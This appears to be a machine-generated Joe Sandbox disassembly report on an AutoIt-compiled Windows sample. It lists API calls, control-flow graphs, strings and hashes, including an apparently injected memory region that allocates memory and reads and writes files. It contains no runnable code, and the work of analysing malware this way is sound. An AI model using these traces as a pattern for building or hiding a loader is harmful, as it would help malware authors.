                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 2641332412-570651680
                                    • Opcode ID: c3276ebc7ae281e13c58f0770f46279d712555d636d97bdf3e3f0e436a582b35
                                    • Instruction ID: ddbcdbccd4d9a57dcbd36e3f816cd8fd13babe584cfeecd3360aa48b91130e27
                                    • Opcode Fuzzy Hash: c3276ebc7ae281e13c58f0770f46279d712555d636d97bdf3e3f0e436a582b35
                                    • Instruction Fuzzy Hash: 4562E270508344DFDB24EF64C895BAA77E8BF84304F04496DFA8A8B392DB75D849CB52
                                    APIs
                                    • ___createFile.LIBCMT ref: 009B5EC3
                                    • ___createFile.LIBCMT ref: 009B5F04
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F2D
                                    • __dosmaperr.LIBCMT ref: 009B5F34
                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F47
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F6A
                                    • __dosmaperr.LIBCMT ref: 009B5F73
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F7C
                                    • __set_osfhnd.LIBCMT ref: 009B5FAC
                                    • __lseeki64_nolock.LIBCMT ref: 009B6016
                                    • __close_nolock.LIBCMT ref: 009B603C
                                    • __chsize_nolock.LIBCMT ref: 009B606C
                                    • __lseeki64_nolock.LIBCMT ref: 009B607E
                                    • __lseeki64_nolock.LIBCMT ref: 009B6176
                                    • __lseeki64_nolock.LIBCMT ref: 009B618B
                                    • __close_nolock.LIBCMT ref: 009B61EB
                                      • Part of subcall function 009AEA9C: CloseHandle.KERNELBASE(00000000,00A2EEF4,00000000,?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAEC
                                      • Part of subcall function 009AEA9C: GetLastError.KERNEL32(?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAF6
                                      • Part of subcall function 009AEA9C: __free_osfhnd.LIBCMT ref: 009AEB03
                                      • Part of subcall function 009AEA9C: __dosmaperr.LIBCMT ref: 009AEB25
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __lseeki64_nolock.LIBCMT ref: 009B620D
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B6342
                                    • ___createFile.LIBCMT ref: 009B6361
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B636E
                                    • __dosmaperr.LIBCMT ref: 009B6375
                                    • __free_osfhnd.LIBCMT ref: 009B6395
                                    • __invoke_watson.LIBCMT ref: 009B63C3
                                    • __wsopen_helper.LIBCMT ref: 009B63DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                    • String ID: @
                                    • API String ID: 3896587723-2766056989
                                    • Opcode ID: b3f6a9b24576e08ccaa14634e6f1cc99b7f817f54e3bfaec1b11c197d8654e3f
                                    • Instruction ID: f30e348cdd8ce608957533b3f117343ea6dde93db703560728912c43a01fb4df
                                    • Opcode Fuzzy Hash: b3f6a9b24576e08ccaa14634e6f1cc99b7f817f54e3bfaec1b11c197d8654e3f
                                    • Instruction Fuzzy Hash: 092245719046099BEF299FA8DE45BFD7B75EB81330F294228E521DB2D2C3399D40CB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 4ba39637066fdc9579335a8c51e6591fc22567d6f415b67531d1ca04a6110f1c
                                    • Instruction ID: 3e376ce8dd8c115fce2f1edf19ceaa19b00188e9bee1c8988715864a64f5079b
                                    • Opcode Fuzzy Hash: 4ba39637066fdc9579335a8c51e6591fc22567d6f415b67531d1ca04a6110f1c
                                    • Instruction Fuzzy Hash: A3322775E042459FDB21CFE8C850BBDBBB5AF87314F24446AE8959B293C7349842CBE0

                                    Control-flow Graph

                                    APIs
                                    • _wcscpy.LIBCMT ref: 009CFA96
                                    • _wcschr.LIBCMT ref: 009CFAA4
                                    • _wcscpy.LIBCMT ref: 009CFABB
                                    • _wcscat.LIBCMT ref: 009CFACA
                                    • _wcscat.LIBCMT ref: 009CFAE8
                                    • _wcscpy.LIBCMT ref: 009CFB09
                                    • __wsplitpath.LIBCMT ref: 009CFBE6
                                    • _wcscpy.LIBCMT ref: 009CFC0B
                                    • _wcscpy.LIBCMT ref: 009CFC1D
                                    • _wcscpy.LIBCMT ref: 009CFC32
                                    • _wcscat.LIBCMT ref: 009CFC47
                                    • _wcscat.LIBCMT ref: 009CFC59
                                    • _wcscat.LIBCMT ref: 009CFC6E
                                      • Part of subcall function 009CBFA4: _wcscmp.LIBCMT ref: 009CC03E
                                      • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC083
                                      • Part of subcall function 009CBFA4: _wcscpy.LIBCMT ref: 009CC096
                                      • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0A9
                                      • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC0CE
                                      • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0E4
                                      • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                    • String ID: >>>AUTOIT SCRIPT<<<
                                    • API String ID: 2955681530-2806939583
                                    • Opcode ID: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
                                    • Instruction ID: 30ffc2ad4dddda102de060fee24056e28e7111c151633335222ab6f32647a253
                                    • Opcode Fuzzy Hash: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
                                    • Instruction Fuzzy Hash: E191A172504705AFDB24EB54C851F9BB3E9BFD8310F04886DF99997292DB30EA44CB92

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00983F86
                                    • RegisterClassExW.USER32(00000030), ref: 00983FB0
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00983FC1
                                    • 6F5133E0.COMCTL32(?), ref: 00983FDE
                                    • 6F522980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
                                    • LoadIconW.USER32(000000A9), ref: 00984004
                                    • 6F51C400.COMCTL32(000000FF,00000000), ref: 00984013
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Register$BrushC400ClassClipboardColorF5133F522980FormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2091571104-1005189915
                                    • Opcode ID: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
                                    • Instruction ID: d009801ffee1aff6c344b19ddf33f75c3767d9f04e123eb7b059e843c3188095
                                    • Opcode Fuzzy Hash: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
                                    • Instruction Fuzzy Hash: 6C21C7B9900318AFDB10DFE4E889BCDBBB4FB49700F01461AF615A62A0D7B545868F91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1006 9cbfa4-9cc054 call 9af8a0 call 99f4ea call 9847b7 call 9cbdb4 call 984517 call 9a15e3 1019 9cc05a-9cc061 call 9cc56d 1006->1019 1020 9cc107-9cc10e call 9cc56d 1006->1020 1025 9cc067-9cc105 call 9a1dfc call 9a0d23 call 9a0cf4 call 9a1dfc call 9a0cf4 * 2 1019->1025 1026 9cc110-9cc112 1019->1026 1020->1026 1027 9cc117 1020->1027 1030 9cc11a-9cc1d6 call 9844ed * 8 call 9cc71a call 9a3499 1025->1030 1029 9cc367-9cc368 1026->1029 1027->1030 1031 9cc385-9cc393 call 9847e2 1029->1031 1065 9cc1df-9cc1fa call 9cbdf8 1030->1065 1066 9cc1d8-9cc1da 1030->1066 1069 9cc28c-9cc298 call 9a35e4 1065->1069 1070 9cc200-9cc208 1065->1070 1066->1029 1077 9cc2ae-9cc2b2 1069->1077 1078 9cc29a-9cc2a9 DeleteFileW 1069->1078 1071 9cc20a-9cc20e 1070->1071 1072 9cc210 1070->1072 1074 9cc215-9cc233 call 9844ed 1071->1074 1072->1074 1084 9cc25d-9cc273 call 9cb791 call 9a2aae 1074->1084 1085 9cc235-9cc23b 1074->1085 1080 9cc2b8-9cc32f call 9cc81d call 9cc845 call 9cb965 1077->1080 1081 9cc342-9cc356 CopyFileW 1077->1081 1078->1029 1083 9cc36a-9cc380 DeleteFileW call 9cc6d9 1080->1083 1102 9cc331-9cc340 DeleteFileW 1080->1102 1082 9cc358-9cc365 DeleteFileW 1081->1082 1081->1083 1082->1029 1083->1031 1097 9cc278-9cc283 1084->1097 1088 9cc23d-9cc250 call 9cbf2e 1085->1088 1098 9cc252-9cc25b 1088->1098 1097->1070 1100 9cc289 1097->1100 1098->1084 1100->1069 1102->1029
                                    APIs
                                      • Part of subcall function 009CBDB4: __time64.LIBCMT ref: 009CBDBE
                                      • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                    • __wsplitpath.LIBCMT ref: 009CC083
                                      • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                    • _wcscpy.LIBCMT ref: 009CC096
                                    • _wcscat.LIBCMT ref: 009CC0A9
                                    • __wsplitpath.LIBCMT ref: 009CC0CE
                                    • _wcscat.LIBCMT ref: 009CC0E4
                                    • _wcscat.LIBCMT ref: 009CC0F7
                                    • _wcscmp.LIBCMT ref: 009CC03E
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC2A1
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC338
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC34E
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC35F
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC371
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                    • String ID:
                                    • API String ID: 2378138488-0
                                    • Opcode ID: 5990efe141d511435a455029e0c21865a6ad462742025a4fb6fc02600131d556
                                    • Instruction ID: 56ce620847d8923a2e897ce4099b4554a9f4ffc8135927bcc88b3587c0448632
                                    • Opcode Fuzzy Hash: 5990efe141d511435a455029e0c21865a6ad462742025a4fb6fc02600131d556
                                    • Instruction Fuzzy Hash: F2C10CB1E00219ABDF11DFA5DC81FDEBBBDAF89310F0040AAF609E6151DB719A448F61

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                    • LoadIconW.USER32(00000063), ref: 00983E9E
                                    • LoadIconW.USER32(000000A4), ref: 00983EB0
                                    • LoadIconW.USER32(000000A2), ref: 00983EC2
                                      • Part of subcall function 00984024: LoadImageW.USER32(00980000,00000063,00000001,00000010,00000010,00000000), ref: 00984048
                                    • RegisterClassExW.USER32(?), ref: 00983F30
                                      • Part of subcall function 00983F53: GetSysColorBrush.USER32(0000000F), ref: 00983F86
                                      • Part of subcall function 00983F53: RegisterClassExW.USER32(00000030), ref: 00983FB0
                                      • Part of subcall function 00983F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00983FC1
                                      • Part of subcall function 00983F53: 6F5133E0.COMCTL32(?), ref: 00983FDE
                                      • Part of subcall function 00983F53: 6F522980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
                                      • Part of subcall function 00983F53: LoadIconW.USER32(000000A9), ref: 00984004
                                      • Part of subcall function 00983F53: 6F51C400.COMCTL32(000000FF,00000000), ref: 00984013
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$C400ClipboardCursorF5133F522980FormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2963837899-4155596026
                                    • Opcode ID: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
                                    • Instruction ID: c080fcea4ea142401e108d48a281108b9a4dda69074a979e8366a674d99d49d2
                                    • Opcode Fuzzy Hash: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
                                    • Instruction Fuzzy Hash: C5212FB9D00314ABDB10DFE9EC45A99BBF5EB89710F00421AE214A72A0D77646868B91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1289 ca8728-ca877a call ca8628 CreateFileW 1292 ca877c-ca877e 1289->1292 1293 ca8783-ca8790 1289->1293 1294 ca88dc-ca88e0 1292->1294 1296 ca8792-ca879e 1293->1296 1297 ca87a3-ca87ba VirtualAlloc 1293->1297 1296->1294 1298 ca87bc-ca87be 1297->1298 1299 ca87c3-ca87e9 CreateFileW 1297->1299 1298->1294 1300 ca87eb-ca8808 1299->1300 1301 ca880d-ca8827 ReadFile 1299->1301 1300->1294 1303 ca884b-ca884f 1301->1303 1304 ca8829-ca8846 1301->1304 1306 ca8870-ca8887 WriteFile 1303->1306 1307 ca8851-ca886e 1303->1307 1304->1294 1308 ca8889-ca88b0 1306->1308 1309 ca88b2-ca88d7 CloseHandle VirtualFree 1306->1309 1307->1294 1308->1294 1309->1294
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00CA876D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction ID: 010431f209878e551291878b1683280dfd4858906933d063e7cd22fa8e9e6aca
                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction Fuzzy Hash: A2510675A50209FBEF20DFA0CC49FEE7B79AF48704F508554F61AEA2C0DE749A449B60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1319 9849fb-984a25 call 98bcce RegOpenKeyExW 1322 9f41cc-9f41e3 RegQueryValueExW 1319->1322 1323 984a2b-984a2f 1319->1323 1324 9f4246-9f424f RegCloseKey 1322->1324 1325 9f41e5-9f4222 call 99f4ea call 9847b7 RegQueryValueExW 1322->1325 1330 9f423d-9f4245 call 9847e2 1325->1330 1331 9f4224-9f423b call 986a63 1325->1331 1330->1324 1331->1330
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009F41DB
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009F421A
                                    • RegCloseKey.ADVAPI32(?), ref: 009F4249
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                    • API String ID: 1586453840-614718249
                                    • Opcode ID: e00bec6a20960ec539c563f7d7ccd1812275688a02f4fea609c7f9f6197a9d29
                                    • Instruction ID: 61d06400a1691c3ad018b7c5cb2e0d9a12fded8466abb24be5b610ff62577ffb
                                    • Opcode Fuzzy Hash: e00bec6a20960ec539c563f7d7ccd1812275688a02f4fea609c7f9f6197a9d29
                                    • Instruction Fuzzy Hash: 14112C71A0010DBEEB04EFE4CD86EFF7BACEF14354F104465B506D6291EA709E429B50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1346 9836b8-983728 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                    • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                    • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                    • Instruction ID: 3aa7ca0d88b30a3918d958ea32edb10721836f2183fe868e50f96df9bff7aabb
                                    • Opcode Fuzzy Hash: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                    • Instruction Fuzzy Hash: 3DF0DA795802D47AE771D7D7AC48E672E7DD7C7F60B00001ABA04A21A0C56608D6DAB1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1451 9851af-9851c5 1452 9851cb-9851e0 call 986b0f 1451->1452 1453 9852a2-9852a6 1451->1453 1456 9f3ca1-9f3cb0 LoadStringW 1452->1456 1457 9851e6-985206 call 986a63 1452->1457 1460 9f3cbb-9f3cd3 call 98510d call 984db1 1456->1460 1457->1460 1461 98520c-985210 1457->1461 1469 985220-98529d call 9a0d50 call 9850e6 call 9a0d23 Shell_NotifyIconW call 98cb37 1460->1469 1473 9f3cd9-9f3cf7 call 98518c call 984db1 call 98518c 1460->1473 1464 985216-98521b call 98510d 1461->1464 1465 9852a7-9852b0 call 986eed 1461->1465 1464->1469 1465->1469 1469->1453 1473->1469
                                    APIs
                                    • _memset.LIBCMT ref: 0098522F
                                    • _wcscpy.LIBCMT ref: 00985283
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009F3CB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 1053898822-1585850449
                                    • Opcode ID: 53f55fdbc4bfb0c2e833875e338d363b88a126b2440198fb3d85586189c173aa
                                    • Instruction ID: dcad910a549ab80e96f39e66d8c5ec94251e185a2e19f6e46cdf2bd579610c80
                                    • Opcode Fuzzy Hash: 53f55fdbc4bfb0c2e833875e338d363b88a126b2440198fb3d85586189c173aa
                                    • Instruction Fuzzy Hash: 1B31CF75008740AFC325FBA0DC46FDA77D8AFC5310F00491EF59996291EB74A68DCB92

                                     Control-flow Graph (graph image omitted)
                                    APIs
                                      • Part of subcall function 009841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                    • _free.LIBCMT ref: 009F36B7
                                    • _free.LIBCMT ref: 009F36FE
                                      • Part of subcall function 0098C833: __wsplitpath.LIBCMT ref: 0098C93E
                                      • Part of subcall function 0098C833: _wcscpy.LIBCMT ref: 0098C953
                                      • Part of subcall function 0098C833: _wcscat.LIBCMT ref: 0098C968
                                      • Part of subcall function 0098C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 805182592-1757145024
                                    • Opcode ID: d1d186b6359b420c1f5adb6eae8c9b396c531b295b1efaed1efb5c9403b929ed
                                    • Instruction ID: 55c1c02228c98b62f0b2484c6ac5e4d8a66a42930956cd957ef4a26f74abb6bb
                                    • Opcode Fuzzy Hash: d1d186b6359b420c1f5adb6eae8c9b396c531b295b1efaed1efb5c9403b929ed
                                    • Instruction Fuzzy Hash: 98913F71910219AFCF04EFA4CC92AFDB7B4BF59310F108429F916EB291DB349A55CB90
                                    APIs
                                      • Part of subcall function 00CAA0F8: Sleep.KERNELBASE(000001F4), ref: 00CAA109
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CAA32F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 7RXW5AB1R9N9M
                                    • API String ID: 2694422964-313853021
                                    • Opcode ID: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction ID: 6bfdcea3f9d5a0079c769362ddad9ac4197d71c17f805ab51c32700b7b149841
                                    • Opcode Fuzzy Hash: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
